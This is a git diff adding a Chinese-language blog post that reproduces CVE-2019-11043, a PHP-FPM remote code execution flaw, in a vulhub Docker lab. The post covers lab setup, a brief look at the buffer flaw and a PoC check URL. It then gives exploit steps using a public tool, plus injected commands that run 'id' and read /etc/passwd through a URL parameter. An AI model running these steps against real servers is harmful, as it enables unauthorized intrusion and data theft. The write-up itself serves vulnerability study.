diff --git "a/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..03cf97f --- /dev/null +++ "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,55 @@ +--- +title: 漏洞复现-PHP-FPM 远程代码执行漏洞 +description: CVE-2019-11043 从一个小的内存溢出到代码执行 +author: #有默认值 +date: 2024-09-10 10:13:14 +0800 +categories: [漏洞复现] +tags: [漏洞复现,RCE] # TAG names should always be lowercase +pin: # 默认false,可填true +math: true +mermaid: true +# image: +# path: /assets/bar/home.png +# lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA +# alt: # 图片名 +--- + +## 构建 + +``` shell +cd vulhub/php/CVE-2019-11043 +docker-compose up -d +``` +cd +## 漏洞原理 +https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md + +https://blog.orange.tw/posts/2019-10-an-analysis-and-thought-about-recently/ + +https://cloud.tencent.com/developer/article/1530703 + +这是一个非常有趣的漏洞!从一个小的内存缺陷到代码执行。它结合了二进制和网络技术, + +## PoC(Proof of Concept) 验证漏洞存在的代码 +作者利用了双缓冲机制,如果缓冲区到达末尾(pos > end),PHP-FPM 会创建一个新的缓冲区,并将前一个缓冲区放入结构成员 fcgi_data_seg->next 中。 +若有 PHPINFO 页面。获取/info.php/%0a.php ,观察 $_SERVER['PATH_INFO'] 是否损坏! +... +影响版本:PHP 5.6-7.x,Nginx>=0.7.31 +## Exp(Exploit)进行实际的攻击利用 +安装漏洞利用工具,和利用 +```shell +git clone https://github.com/neex/phuip-fpizdam.git +cd phuip-fpizdam +go run . "http://your-ip:8080/index.php" +``` +![](../assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png) +访问http://your-ip:8080/index.php?a=id,即可查看到id命令已成功执行 +![](../assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png) +注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行RCE命令,会出现成功执行 +```shell +/index.php?a=cat /etc/passwd +``` + + +## 复现总结 +无法直接通过url传入反弹shell命令,执行失败 diff --git a/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png b/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png new file mode 100644 index 0000000..e95ec28 Binary files /dev/null and b/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png differ diff --git a/assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png b/assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png new file mode 100644 index 0000000..46d1603 Binary files /dev/null and b/assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png differ